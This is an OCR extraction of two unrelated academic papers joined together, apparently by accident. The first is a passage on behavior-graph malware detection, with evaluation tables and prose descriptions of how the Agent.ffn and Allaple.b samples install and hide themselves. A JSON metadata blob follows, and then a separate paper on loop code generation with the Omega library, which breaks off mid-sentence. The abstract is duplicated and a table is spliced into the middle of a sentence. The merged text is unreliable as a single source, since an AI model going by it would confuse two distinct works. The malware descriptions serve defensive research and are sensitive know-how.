families were selected because they are very popular, both in our own malware data collection (which we obtained from Table 2: Training dataset. <table> <thead> <tr> <th>Name</th> <th>Samples</th> <th>Kaspersky variants</th> <th>Our variants</th> <th>Samples detected</th> <th>Effectiveness</th> </tr> </thead> <tbody> <tr> <td>Allaple</td> <td>50</td> <td>2</td> <td>1</td> <td>50</td> <td>1.00</td> </tr> <tr> <td>Bagle</td> <td>50</td> <td>20</td> <td>14</td> <td>46</td> <td>0.92</td> </tr> <tr> <td>Mytob</td> <td>50</td> <td>32</td> <td>12</td> <td>47</td> <td>0.94</td> </tr> <tr> <td>Agent</td> <td>50</td> <td>20</td> <td>2</td> <td>41</td> <td>0.82</td> </tr> <tr> <td>Netsky</td> <td>50</td> <td>22</td> <td>12</td> <td>46</td> <td>0.92</td> </tr> <tr> <td>Mydoom</td> <td>50</td> <td>6</td> <td>3</td> <td>49</td> <td>0.98</td> </tr> <tr> <td>Total</td> <td>300</td> <td>102</td> <td>44</td> <td>279</td> <td>0.93</td> </tr> </tbody> </table> Anubis [1]) and according to lists compiled by anti-virus vendors. Moreover, these families provide a good cross section of popular malware classes, such as mail-based worms, exploit-based worms, and a Trojan horse. Some of the families use code polymorphism to make it harder for signature-based scanners to detect them. For each malware family, we randomly selected 100 samples from our database. The selection was based on the labels produced by the Kaspersky anti-virus scanner and included different variants for each family. During the selection process, we discarded samples that, in our test environment, did not exhibit any interesting behavior. Specifically, we discarded samples that did not modify the file system, spawn new processes, or perform network communication. For the Netsky family, only 63 different samples were available in our dataset. Detection capabilities. For each of our six malware families, we randomly selected 50 samples. These samples were then used for the extraction of behavior graphs. Table 2 provides some details on the training dataset. The “Kaspersky variants” column shows the number of different variants (labels) identified by the Kaspersky anti-virus scanner (these are variants such as Netsky.k or Netsky.aa). The “Our variants” column shows the number of different samples from which (different) behavior graphs had to be extracted before the training dataset was covered. Interestingly, as shown by the “Samples detected” column, it was not possible to extract behavior graphs for the entire training set. The reasons for this are twofold: First, some samples did not perform any interesting activity during behavior graph extraction (despite the fact that they did show relevant behavior during the initial selection process). Second, for some malware programs, our system was not able to extract valid behavior graphs. This is due to limitations of the current prototype that produced invalid slices (i.e., functions that simply crashed when executed). To evaluate the detection effectiveness of our system, we used the behavior graphs extracted from the training dataset to perform detection on the remaining 263 samples (the test dataset). The results are shown in Table 3. It can be seen that some malware families, such as Allaple and Mydoom, can be detected very accurately. For others, the results appear worse. However, we have to consider that different malware variants may exhibit different behavior, so it may be unrealistic to expect that a behavior graph for one variant always matches samples belonging to another variant. This is further exacerbated by the fact that anti-virus software is not particularly good at classifying malware (a problem that has also been discussed in previous work [5]). As a result, the dataset likely contains mislabeled programs that belong to different malware families altogether. This was confirmed by manual inspection, which revealed that certain malware families (in particular, the Agent family) contain a large number of variants with widely varying behavior. To confirm that different malware variants are indeed the root cause of the lower detection effectiveness, we then restricted our analysis to the 155 samples in the test dataset that belong to “known” variants. That is, we only considered those samples that belong to malware variants that are also present in the training dataset (according to Kaspersky labels). For this dataset, we obtain a detection effectiveness of 0.92. This is very similar to the result of 0.93 obtained on the training dataset. Conversely, if we restrict our analysis to the 108 samples that do not belong to a known variant, we obtain a detection effectiveness of only 0.23. While this value is significantly lower, it still demonstrates that our system is sometimes capable of detecting malware belonging to previously unknown variants. Together with the number of variants shown in Table 2, this indicates that our tool produces a behavior-based malware classification that is more general than that produced by an anti-virus scanner, and therefore, requires a smaller number of behavior graphs than signatures. <table> <thead> <tr> <th>Name</th> <th>Samples</th> <th>Known variant samples</th> <th>Samples detected</th> <th>Effectiveness</th> </tr> </thead> <tbody> <tr> <td>Allaple</td> <td>50</td> <td>50</td> <td>45</td> <td>0.90</td> </tr> <tr> <td>Bagle</td> <td>50</td> <td>26</td> <td>30</td> <td>0.60</td> </tr> <tr> <td>Mytob</td> <td>50</td> <td>26</td> <td>36</td> <td>0.72</td> </tr> <tr> <td>Agent</td> <td>50</td> <td>4</td> <td>5</td> <td>0.10</td> </tr> <tr> <td>Netsky</td> <td>13</td> <td>5</td> <td>7</td> <td>0.54</td> </tr> <tr> <td>Mydoom</td> <td>50</td> <td>44</td> <td>45</td> <td>0.90</td> </tr> <tr> <td>Total</td> <td>263</td> <td>155</td> <td>168</td> <td>0.64</td> </tr> </tbody> </table> Table 3: Detection effectiveness. **False positives.** In the next step, we attempted to evaluate the amount of false positives that our system would produce. For this, we installed a number of popular applications on our test machine, which runs Microsoft Windows XP and our scanner. More precisely, we used Internet Explorer, Firefox, Thunderbird, putty, and Notepad. For each of these applications, we went through a series of common use cases. For example, we surfed the web with IE and Firefox, sent a mail with Thunderbird (including an attachment), performed a remote ssh login with putty, and used notepad for writing and saving text. No false positives were raised in these tests. This was expected, since our models typically capture quite tightly the behavior of the individual malware families. However, if we omitted the checks for complex functions and assumed all complex dependencies in the behavior graph to hold, all of the above applications raised false positives. This shows that our tool’s ability to capture arbitrary data-flow dependencies and verify them at runtime is essential for effective detection. It also indicates that, in general, system call information alone (without considering complex relationships between their arguments) might not be sufficient to distinguish between legitimate and malicious behavior. In addition to the Windows applications mentioned previously, we also installed a number of tools for performance measurement, as discussed in the following section. While running the performance tests, we also did not experience any false positives. **4.2 System Efficiency** As every malware scanner, our detection mechanism stands and falls with the performance degradation it causes on a running system. To evaluate the performance impact of our detection mechanism, we used 7-zip, a well-known compression utility, Microsoft Internet Explorer, and Microsoft Visual Studio. We performed the tests on a single-core, 1.8 GHz Pentium 4 running Windows XP with 1 GB of RAM. For the first test, we used a command line option for 7-zip that makes it run a simple benchmark. This reflects the case in which an application is mostly performing CPU-bound computation. In another test, 7-zip was used to compress a folder that contains 215 MB of data (6,859 files in 808 subfolders). This test represents a more mixed workload. The third test consisted of using 7-zip to archive three copies of this same folder, performing no compression. This is a purely IO-bound workload. The next test measures the number of pages per second that could be rendered in Internet Explorer. For this test, we used a local copy of a large (1.5MB) web page [3]. For the final test, we measured the time required to compile and build our scanner tool using Microsoft Visual Studio. The source code of this tool consists of 67 files and over 17,000 lines of code. For all tests, we first ran the benchmark on the unmodified operating system (to obtain a baseline). Then, we enabled the kernel driver that logs system call parameters, but did not enable any user-mode detection processing of this output. Finally, we also enabled our malware detector with the full set of 44 behavior graphs. The results are summarized in Table 4. As can be seen, our tool has a very low overhead (below 5%) for CPU-bound benchmarks. Also, it performs well in the I/O-bound experiment (with less than 10% overhead). The worst performance occurs in the compilation benchmark, where the system incurs an overhead of 39.8%. It may seem surprising at first that our tool performs worse in this benchmark than in the I/O-bound archive benchmark. However, during compilation, the scanned application is performing almost 5,000 system calls per second, while in the archive benchmark, this value is around 700. Since the amount of computation performed in user-mode by our scanner increases with the number of system calls, compilation is a worst-case scenario for our tool. Furthermore, the more varied workload in the compile benchmark causes more complex functions to be evaluated. The 39.8% overhead of the compile benchmark can further be broken down into 12.2% for the kernel driver, 16.7\% for the evaluation of complex functions, and 10.9\% for the remaining user-mode processing. Note that the high cost of complex function evaluation could be reduced by improving our symbolic execution engine, so that less complex functions need to be evaluated. Furthermore, our prototype implementation spawns a new process every time that the verification of complex dependencies is triggered, causing unnecessary overhead. Nevertheless, we feel that our prototype performs well for common tasks, and the current overhead allows the system to be used on (most) end user’s hosts. Moreover, even in the worst case, the tool incurs significantly less overhead than systems that perform dynamic taint propagation (where the overhead is typically several times the baseline). ### 4.3 Examples of Behavior Graphs To provide a better understanding of the type of behavior that is modeled by our system, we provide a short description of two behavior graphs extracted from variants of the Agent and Allaple malware families. **Agent.ffn.StartService.** The Agent.ffn variant contains a resource section that stores chunks of binary data. During execution, the binary queries for one of these stored resources and processes its content with a simple, custom decryption routine. This routine uses a variant of XOR decryption with a key that changes as the decryption proceeds. In a later step, the decrypted data is used to overwrite the Windows system file `\C:\WINDOWS\System32\drivers\ip6fw.sys`. Interestingly, rather than directly writing to the file, the malware opens the `\C:` logical partition at the offset where the `ip6fw.sys` file is stored, and directly writes to that location. Finally, the malware restarts Windows XP’s integrated IPv6 firewall service, effectively executing the previously decrypted code. Figure 3 shows a simplified behavior graph that captures this behavior. The graph contains nine nodes, connected through ten dependencies: six simple dependencies representing the reuse of previously obtained object handles (annotated with the parameter name), and four complex dependencies. The complex dependency that captures the previously described decryption routine is indicated by a bold arrow in Figure 3. Here, the LockResource function provides the body of the encrypted resource section. The NtQueryInformationFile call provides information about the `ip6fw.sys` file. The `\C:` logical partition is opened in the NtCreateFile node. Finally, the NtWriteFile system call overwrites the firewall service program with malicious code. The check of the complex dependency is triggered by the activation of the last node (bold in the figure). **Figure 3: Behavior graph for Agent.ffn.** **Figure 4: Behavior graph for Allaple.b.** Allaple.b.CreateProcess. Once started, the Allaple.b variant copies itself to the file c:\WINDOWS\system32\urdvxc.exe. Then, it invokes this executable various times with different command-line arguments. First, urdvxc.exe /installservice and urdvxc.exe /start are used to execute stealthily as a system service. In a second step, the malware tries to remove its traces by eliminating the original binary. This is done by calling urdvxc.exe /uninstallservice patch:<binary> (where <binary> is the name of the originally started program). The graph shown in Figure 4 models part of this behavior. In the NtCreateFile node, the urdvxc.exe file is created. This file is then invoked three times with different arguments, resulting in three almost identical subgraphs. The box on the right-hand side of Figure 4 is an enlargement of one of these subgraphs. Here, the NtCreateProcessEx node represents the invocation of the urdvxc.exe program. The argument to the uninstall command (i.e., the name of the original binary) is supplied by the GetModuleFileName function to the NtCreateThread call. The last NtResumeThread system call triggers the verification of the complex dependencies. 5 Limitations In this section, we discuss the limitations and possible attacks against our current system. Furthermore, we discuss possible solutions to address these limitations. Evading signature generation. A main premise of our system is that we can observe a sample’s malicious activities inside our system emulator. Furthermore, we require to find taint dependencies between data sources and the corresponding sinks. If a malware accomplishes to circumvent any of these two required steps, our system cannot generate system call signatures or find a starting point for the slicing process. Note that our system is based on an unaccelerated version of Qemu. Since this is a system emulator (i.e., not a virtual machine), it implies that certain trivial means of detecting the virtual environment (e.g., such as Red Pill as described in [36]) are not applicable. Detecting a system emulator is an arms race against the accuracy of the emulator itself. Malware authors could also use delays, time-triggered behavior, or command and control mechanisms to try to prevent the malware from performing any malicious actions during our analysis. This is indeed the fundamental limitation of all dynamic approaches to the analysis of malicious code. In maintaining taint label propagation, we implemented data and control dependent taint propagation and pursue a conservative approach to circumvent the loss of taint information as much as possible. Our results show that we are able to deal well with current malware. However, as soon as we observe threats in the wild targeting this feature of our system, we would need to adapt our approach. Modifying the algorithm (input-output) behavior. Our system’s main focus lies on the detection of data input-output relations and the malicious algorithm that the malware author has created (e.g., propagation technique). As soon as a malware writer decides to implement a new algorithm (e.g., using a different propagation approach), our slices would not be usable for this new malware type. However, note that completely modifying the malicious algorithms contained in a program requires considerable manual work as this process is difficult to automate. As a result, our system raises the bar significantly for the malware author and makes this process more costly. 6 Related Work There is a large number of previous work that studies the behavior [34, 37, 42] or the prevalence [31, 35] of different types of malware. Moreover, there are several systems [6, 47, 53, 54] that aid an analyst in understanding the actions that a malware program performs. Furthermore, techniques have been proposed to classify malware based on its behavior using a supervised [39] or unsupervised [5, 7] learning approach. In this paper, we propose a novel technique to effectively and efficiently identify malicious code on the end host. Thus, we focus on related work in the area of malware detection. Network detection. One line of research focuses on the development of systems that detect malicious code at the network level. Most of these systems [20, 32, 33] use content-based signatures that specify tokens that are characteristic for certain malware families. Other approaches check for anomalous connections [19] or for network traffic that has suspicious properties [49]. While network-based detection has the advantage that a single sensor can monitor the traffic to multiple machines, there are a number of drawbacks. First, malware has significant freedom in altering network traffic, and thus, evade detection [17, 46]. Second, not all malware programs use the network to carry out their nefarious tasks. Third, even when an infected host is identified, additional action is necessary to terminate the malware program. Static analysis. The traditional approach to detecting malware on the end host (which is implemented by antivirus software) is based on statically scanning executables for strings or instruction sequences that are characteristic for a malware sample [46]. These strings are typically extracted from the analysis of individual programs. The problem is that such strings are typically specific to the syntactic appearance of a certain malware instance. Using code polymorphism and obfuscation, malware programs can alter their appearance while keeping their behavior (functionality) unchanged [11, 46]. As a result, they can easily evade signature-based scanners. As a reaction to the limitations of signature-based detection, researchers have proposed a number of higher-order properties to describe executables. The hope is that such properties capture intrinsic characteristics of a malware program and thus, are more difficult to disguise. One such property is the distribution of character n-grams in a file [26, 27]. This property can help to identify embedded malicious code in other files types, for example, Word documents. Another property is the control flow graph (CFG) of an application, which was used to detect polymorphic variants of malicious code instances that all share the same CFG structure [8, 24]. More sophisticated static analysis approaches rely on code templates or specifications that capture the malicious functionality of certain malware families. Here, symbolic execution [25], model checking [21], or techniques from compiler verification [13] are applied to recognize arbitrary code fragments that implement a specific function. The power of these techniques lies in the fact that a certain functionality can always be identified, independent of the specific machine instructions that express it. Unfortunately, static analysis for malware detection faces a number of significant problems. One problem is that current malware programs rely heavily on run-time packing and self-modifying code [46]. Thus, the instruction present in the binary on disk are typically different than those executed at runtime. While generic unpackers [40] can sometimes help to obtain the actual instructions, binary analysis of obfuscated code is still very difficult [30]. Moreover, most advanced, static analysis approaches are very slow (in the order of minutes for one sample [13]). This makes them unsuitable for detection in real-world deployment scenarios. Dynamic analysis. Dynamic analysis techniques detect malicious code by analyzing the execution of a program or the effects that this program has on the platform (operating system). An example of the latter category is Strider GhostBuster [51]. The tool compares the view of the system provided by a possible compromised OS to the view that is gathered when accessing the file system directly. This can detect the presence of certain types of rootkits that attempt to hide from the user by filtering the results of system calls. The work that most closely relates to our own is Christodorescu et al. [12]. In [12], malware specifications (malspecs) are extracted by contrasting the behavior of a malware instance against a corpus of benign behaviors. Similarly to our behavior graphs, malspecs are DAGs where each node corresponds to a system call invocation. However, malspecs do not encode arbitrary data flow dependencies between system call parameters, and are therefore less specific than the behavior graphs described in this work. As discussed in Section 4, using behavior graphs for detection without verifying that complex dependencies hold would lead to an unacceptably large number of false positives. In [22], a dynamic spyware detector system is presented that feeds browser events into Internet Explorer Browser Helper Objects (i.e., BHOs – IE plugins) and observes how the BHOs react to these browser events. An improved, tainting-based approach called Tquana is presented in [16]. In this system, memory tainting on a modified Qemu analysis environment is used to track the information that flows through a BHO. If the BHO collects sensitive data, writes this data to the disk, or sends this data over the network, the BHO is considered to be suspicious. In Panorama [54], whole-system taint analysis is performed to detect malicious code. The taint sources are typically devices such as a network card or the keyboard. In [44], bots are detected by using taint propagation to distinguish between behavior that is initiated locally and behavior that is triggered by remote commands over the network. In [29], malware is detected using a hierarchy of manually crafted behavior specifications. To obtain acceptable false positive rates, taint tracking is employed to determine whether a behavior was initiated by user input. Although such approaches may be promising in terms of detection effectiveness, they require taint tracking on the end host to be able to perform detection. Tracking taint information across the execution of arbitrary, untrusted code typically requires emulation. This causes significant performance overhead, making such approaches unsuitable for deployment on end user’s machines. In contrast, our system employs taint tracking when extracting a model of behavior from malicious code, but it does not require tainting to perform detection based on that model. Our system can, therefore, efficiently and effectively detect malware on the end user’s machine. Dialog rewriting. In their technical report [9], the authors present Rosetta, a system that extracts relationships (transformation functions) between input and output fields of network protocols. These relationships are important to be able to compute the correct values of dynamic fields when performing protocol replay or NAT rewriting. To extract transformation functions, the authors use binary analysis, dynamic program slicing, and symbolic execution. Their approach resembles the techniques that we use for inferring complex dependencies between system call arguments. Of course, there are also significant differences between their work and ours. First, the problem domain and the goals of the two systems are entirely different. Second, we use symbolic execution as an optimization step and can execute functions (slices) even when no symbolic formula can be found. 7 Conclusion Although a considerable amount of research effort has gone into malware analysis and detection, malicious code still remains an important threat on the Internet today. Unfortunately, the existing malware detection techniques have serious shortcomings as they are based on ineffective detection models. For example, signature-based techniques that are commonly used by anti-virus software can easily be bypassed using obfuscation or polymorphism, and system call-based approaches can often be evaded by system call reordering attacks. Furthermore, detection techniques that rely on dynamic analysis are often strong, but too slow and hence, inefficient to be used as real-time detectors on end user machines. In this paper, we proposed a novel malware detection approach. Our approach is both effective and efficient, and thus, can be used to replace or complement traditional AV software at the end host. Our detection models cannot be easily evaded by simple obfuscation or polymorphic techniques as we try to distill the behavior of malware programs rather than their instance-specific characteristics. We generate these fine-grained models by executing the malware program in a controlled environment, monitoring and observing its interactions with the operating system. The malware detection then operates by matching the automatically-generated behavior models against the runtime behavior of unknown programs. Acknowledgments The authors would like to thank Christoph Karlberger for his invaluable programming effort and advice concerning the Windows kernel driver. This work has been supported by the Austrian Science Foundation (FWF) and by Secure Business Austria (SBA) under grants P-18764, P-18157, and P-18368, and by the European Commission through project FP7-ICT-216026-WOMBAT. Xiaoyong Zhou and Xiaofeng Wang were supported in part by the National Science Foundation Cyber Trust program under Grant No. CNS-0716292. References
{"Source-Url": "http://www.eurecom.fr/en/publication/2774/download/rs-publi-2774.pdf", "len_cl100k_base": 14845, "olmocr-version": "0.1.53", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 57761, "total-output-tokens": 18482, "length": "2e13", "weborganizer": {"__label__adult": 0.0007071495056152344, "__label__art_design": 0.0006766319274902344, "__label__crime_law": 0.006725311279296875, "__label__education_jobs": 0.001789093017578125, "__label__entertainment": 0.0003669261932373047, "__label__fashion_beauty": 0.0003361701965332031, "__label__finance_business": 0.00034809112548828125, "__label__food_dining": 0.0005741119384765625, "__label__games": 0.003520965576171875, "__label__hardware": 0.0034046173095703125, "__label__health": 0.0010347366333007812, "__label__history": 0.000713348388671875, "__label__home_hobbies": 0.0002033710479736328, "__label__industrial": 0.0008864402770996094, "__label__literature": 0.0008554458618164062, "__label__politics": 0.0008091926574707031, "__label__religion": 0.0006895065307617188, "__label__science_tech": 0.353759765625, "__label__social_life": 0.0002236366271972656, "__label__software": 0.10052490234375, "__label__software_dev": 0.5205078125, "__label__sports_fitness": 0.0004014968872070313, "__label__transportation": 0.00049591064453125, "__label__travel": 0.0002429485321044922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 81531, 0.02451]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 81531, 0.58398]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 81531, 0.91026]], "google_gemma-3-12b-it_contains_pii": [[0, 4467, false], [4467, 10081, null], [10081, 15788, null], [15788, 21531, null], [21531, 27007, null], [27007, 30715, null], [30715, 35674, null], [35674, 41090, null], [41090, 46434, null], [46434, 51435, null], [51435, 56322, null], [56322, 59101, null], [59101, 64051, null], [64051, 69750, null], [69750, 75282, null], [75282, 81531, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4467, true], [4467, 10081, null], [10081, 15788, null], [15788, 21531, null], [21531, 27007, null], [27007, 30715, null], [30715, 35674, null], [35674, 41090, null], [41090, 46434, null], [46434, 51435, null], [51435, 56322, null], [56322, 59101, null], [59101, 64051, null], [64051, 69750, null], [69750, 75282, null], [75282, 81531, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 81531, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 81531, null]], "pdf_page_numbers": [[0, 4467, 1], [4467, 10081, 2], [10081, 15788, 3], [15788, 21531, 4], [21531, 27007, 5], [27007, 30715, 6], [30715, 35674, 7], [35674, 41090, 8], [41090, 46434, 9], [46434, 51435, 10], [51435, 56322, 11], [56322, 59101, 12], [59101, 64051, 13], [64051, 69750, 14], [69750, 75282, 15], [75282, 81531, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 81531, 0.11712]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
6cfaf0d3612268d76b0eeea9d81530da82a16559
Abstract There has been a great amount of recent work toward unifying iteration reordering transformations. Many of these approaches represent transformations as affine mappings from the original iteration space to a new iteration space. These approaches show a great deal of promise, but they all rely on the ability to generate code that iterates over the points in these new iteration spaces in the appropriate order. This problem has been fairly well-studied in the case where all statements use the same mapping. We have developed an algorithm for the less well-studied case where each statement uses a potentially different mapping. Unlike many other approaches, our algorithm can also generate code from mappings corresponding to loop blocking. We address the important trade-off between reducing control overhead and duplicating code. This work is supported by an NSF PYI grant CCR-9157384 and by a Packard Fellowship. Abstract There has been a great amount of recent work toward unifying iteration reordering transformations. Many of these approaches represent transformations as affine mappings from the original iteration space to a new iteration space. These approaches show a great deal of promise, but they all rely on the ability to generate code that iterates over the points in these new iteration spaces in the appropriate order. This problem has been fairly well-studied in the case where all statements use the same mapping. We have developed an algorithm for the less well-studied case where each statement uses a potentially different mapping. Unlike many other approaches, our algorithm can also generate code from mappings corresponding to loop blocking. We address the important trade-off between reducing control overhead and duplicating code. 1 Introduction Optimizing compilers apply iteration reordering transformations for a variety of reasons. By changing the order of computations in a loop, these transformations can expose parallelism and improve data locality. They can also be used together with other techniques to improve the efficiency of SPMD code, for example, by moving communication statements out of loops, or by restructuring loops to avoid the execution of iterations which do no work. Traditionally, reordering transformations have been used by applying a sequence of pre-specified transformations such as loop interchange, loop distribution, skewing, tiling, index set splitting and statement reordering [21]. Each of these transformations has its own legality checks and transformation rules. These checks and rules make it hard to analyze or predict the effects of a sequence of these transformations without actually performing the transformations and analyzing the resulting code. This complexity has inspired a great deal of recent work toward unified systems for iteration reordering transformations [3, 20, 15, 10, 8]. These approaches use a variety of formalisms, but most can be considered as special cases of a formalism we have developed [12]. In our formalism, transformations are represented as one-to-one mappings from the original iteration space to a new iteration space. We allow a potentially different mapping to be used for each atomic statement. We restrict the mappings to be those that can be represented using affine constraints. Unimodular transformations can be viewed as the special case where there is a single atomic statement (the body of a set of perfectly nested loops) and the mapping is restricted to be linear and onto. The extended unimodular transformations developed by Li and Pingali [15] removes the onto restriction. The schedules produced by Feautrier [10] are not, by themselves, one-to-one, but when they are combined with the space mappings, they become one-to-one. Feautrier allows a potentially different schedule to be used for each atomic statement. Schedules are also used by a number of other researchers [14, 8]. We use the following notation to represent the mapping used for statement \( s_p \): \[ T_p : [i_1, \ldots, i_m] \rightarrow [f_1, \ldots, f_n] \] where: - \( i_1, \ldots, i_m \) are the index variables of the loops nested around statement \( s_p \). - The \( f_j \)'s (called mapping components) are quasi-affine functions [1] of the iteration variables and symbolic constants. This mapping represents the fact that iteration \([i_1, \ldots, i_m]\) in the original iteration space of statement \( s_p \) is mapped to iteration \([f_1, \ldots, f_n]\) in the new iteration space. Finding legal mappings that produce efficient code is an important and difficult problem, but is not discussed in this paper. We refer interested readers to our earlier work in that area [12, 11, 13]. This paper deals with the problem of generating transformed code given an original program and a mapping. This involves creating loops and conditionals that iterate over all and only those points in the new iteration space. When each statement uses the same mapping, and that mapping is linear and onto, code generation is relatively simple. If we start with a convex iteration space and apply a one-to-one and onto mapping, then the transformed iteration space will also be convex. The problem of generating perfectly nested loops to iterate over all and only those points in such a convex region has been studied by a number of researchers starting with the seminal work of Ancourt and Irigoin [1]. If the original iteration space is non-convex (as a consequence of non-unit loop steps), or if the mapping applied is not onto, then the transformed iteration space may be non-convex. In these cases it is still possible to generate suitable perfectly nested loops; however, some of the loop steps will be non-unit. Techniques for handling this case are described by Li and Pingali [15]. Our work addresses the case where a potentially different mapping is used for each statement. The corresponding transformed iteration space can be “very” non-convex; that is, there is no set of perfectly nested loops without conditionals, even with non-unit steps, that can scan the space. The simplest code for a non-convex iteration space scans the convex hull of the space, and tests the conditions under which each statement should be executed at the innermost level. This method can incur a high control overhead. We can eliminate control overhead by breaking the convex hull into a sequence of smaller, tighter regions, which eliminates the need for conditionals at the expense of code duplication. Figure 1 shows an example of this. Eliminating control overhead tends to be particularly important for transformations that radically alter the structure of the original program such as when loop blocking is performed or when the transformed iteration spaces of different statements overlap in complex ways. Our algorithm can be summarized as follows: We first construct an abstract syntax tree (AST) that defines an initial structure of the loops and conditions. In determining the initial structure we try to introduce as little control overhead as possible under the restriction that no code duplication is introduced. Sec- <table> <thead> <tr> <th>Code generated for the iteration spaces:</th> </tr> </thead> <tbody> <tr> <td>$I_1: {(i, j): 1 \leq i \leq 10 \land j = 1}$</td> </tr> <tr> <td>$I_2: {(i, j): 1 \leq i \leq 5 \land 1 \leq j \leq 10}$</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Code with no duplication:</th> </tr> </thead> <tbody> <tr> <td>for $i = 1$ to $10$</td> </tr> <tr> <td>for $j = 1$ to $10$</td> </tr> <tr> <td>if ($j = 1$) $s1[i, j]$</td> </tr> <tr> <td>if ($i &lt; 5$) $s2[i, j]$</td> </tr> </tbody> </table> <table> <thead> <tr> <th>Code with no avoidable control overhead:</th> </tr> </thead> <tbody> <tr> <td>for $i = 1$ to $5$</td> </tr> <tr> <td>$s1[i, 1]$</td> </tr> <tr> <td>for $j = 1$ to $10$</td> </tr> <tr> <td>$s2[i, j]$</td> </tr> <tr> <td>for $i = 6$ to $10$</td> </tr> <tr> <td>$s1[i, 1]$</td> </tr> </tbody> </table> Figure 1: Control overhead versus code duplication Section 3 describes the structure of our abstract syntax trees, and Section 4, describes how we determine an initial AST that produces no code duplication. Next, we augment this tree with more detailed information regarding the conditions and loop bounds of the conditionals and loops respectively. This is described in Section 5. Next we consider the problem of removing control overhead. Sources of overhead nested inside the most loops will be executed most frequently and are the most important to remove. But further removing overhead requires code duplication and an increase in code size. This trade-off is controlled by specifying the depths from which overhead will be eliminated. This optimization algorithm is described in Section 7. Once we have performed this optimization, we generate the actual code using the abstract syntax tree and the information that it contains. Section 6 describes how to generate code from an AST. Before describing the actual algorithm we first summarize the Omega library, a set of routines that we use to represent and manipulate sets of affine constraints, in Section 2. ## 2 The Omega library Many code generation algorithms use linear algebra to represent and manipulate sections of iteration spaces. We use higher-level abstractions called tuple sets and tuple relations. An integer $k$-tuple is a point in $\mathbb{Z}^k$. A tuple relation is a mapping from tuples to restrict_domain \{ R, S \} \ \{ i \rightarrow j \mid i \rightarrow j \in R \land i \in S \} range (R) \ \{ j \mid i \rightarrow j \in R \} project (S, 1...r) \ \{ [t_1...t_r] \mid \exists \text{integers } t_{r+1}...t_n \text{ s.t. } [t_1,...,t_r,t_{r+1},...,t_n] \in S \} gist (S, K) \ \text{least constrained set } S' \text{ s.t. } (S' \land K) \Leftrightarrow (S \land K) convex_hull (\{S_1,...,S_m\}) \ \text{TupleSet represented by constraints} \ \{ c \mid c \text{ part of } S_i \land \forall j=1...m(S_j \land c) \Rightarrow S_j \} Figure 2: Functions provided by the Omega Library Restricting a domain is a set of tuples and a tuple set is a set of tuples. Tuple relations and sets are represented using the Omega Library [16, 18], which is a set of routines for manipulating affine constraints over integer variables. The relations and sets may involve symbolic constants such as n in the following example: \{ [i] \rightarrow [i+1] \mid 1 \leq i \leq n \}. They may also involve existentially quantified variables such as a in the following example: \{ [i] \mid \exists a \text{ s.t. } i = 2a \land 1 \leq i \leq 10 \}. Relationships between the variables are represented by a disjunction of conjunctions of affine constraints. Figure 2 gives a brief description of the operations on tuple relations and sets that we use in code generation. All operators return their results in the simplest form possible, i.e., redundant constraints are always detected and removed. 3 Code Structure This section describes the abstract syntax trees (AST) that we use to define the structure of the loops and conditions. An AST can contain three types of nodes: split nodes - This type of node is labeled with a condition \( c \) and has two children named true_child and false_child. A node of this type corresponds to a sequence of two code fragments. The first code fragment will execute iterations that satisfy the condition \( c \) and all of the conditions contained in split nodes above the current one. The true_child defines the structure of the first code fragment and the false_child defines the structure of the second code fragment. The condition must be such that the iterations executed by the true branch are lexicographically less than the iterations executed by the false branch. loop nodes - This type of node is labeled with an index variable \( i_k \) and has only one child. A node of this type corresponds to a for loop, possibly surrounded by a conditional statement. The for nodes loop iterates over all valid values of the index variable \( i_k \). If there exists an iteration \([i_1,...,i_n] \) of any statement \( s \) that satisfies all of the conditions contained in split nodes above the current node then \( i_k \) is a valid value. The conditional statement is inserted, if necessary, to enforce constraints contained in split nodes above the current node that don’t involve the current index variable and to ensure that at least one iteration of the for loop will be executed. leaf - As its name implies, this type of node has no children. A node of this type corresponds to a sequence of atomic statements. Each atomic statement is surrounded, if necessary, by a conditional statement to ensure that only those iterations that satisfy all of the conditions contained in split nodes above the current node are executed. Every path from the root to a leaf contains \( n \) loop nodes labeled with index variables \( i_1,...,i_n \) in that order. The condition in a split node refers only to index variables \( i_1,...,i_k \), where \( i_k \) is the label of the first loop node below that split node. Figure 4 contains an example of an AST and its corresponding code. 4 Initial code structure In this section we describe how to construct the AST that defines the initial structure of the loops and conditions. In the initial structure we try to introduce as little control overhead as possible, under the restriction that no code is duplicated. If we were to use this initial structure to generate code, then we would obtain code that is correct but might contain too much overhead. In Section 7 we describe how to modify the initial structure, to decrease overhead at the expense of increased code size. The algorithm to construct the initial AST is given in Figure 4 and explained below. Our first step is to compute the new iteration spaces belonging to each of the statements. We restrict the domains of the mappings to the original iteration spaces. The new iteration spaces are the ranges of these restricted mappings. These new iteration spaces may be disjoint or may overlap. We need to generate code that will execute each statement at all and only those points in its respective iteration space. The new code must also execute the iterations in lexicographical order based on the new coordinate system. Since the new iteration spaces may overlap, the new code may have to interleave the execution of different statements. At this stage, we calculate only the basic structure of the loop nests, not the loop bounds. We will create nested loops to iterate over all of the points \([t_1, \ldots, t_n]\) in the new iteration spaces. The outermost loop will iterate over the appropriate values of \(t_1\), the next outermost loop iterates over the appropriate values of 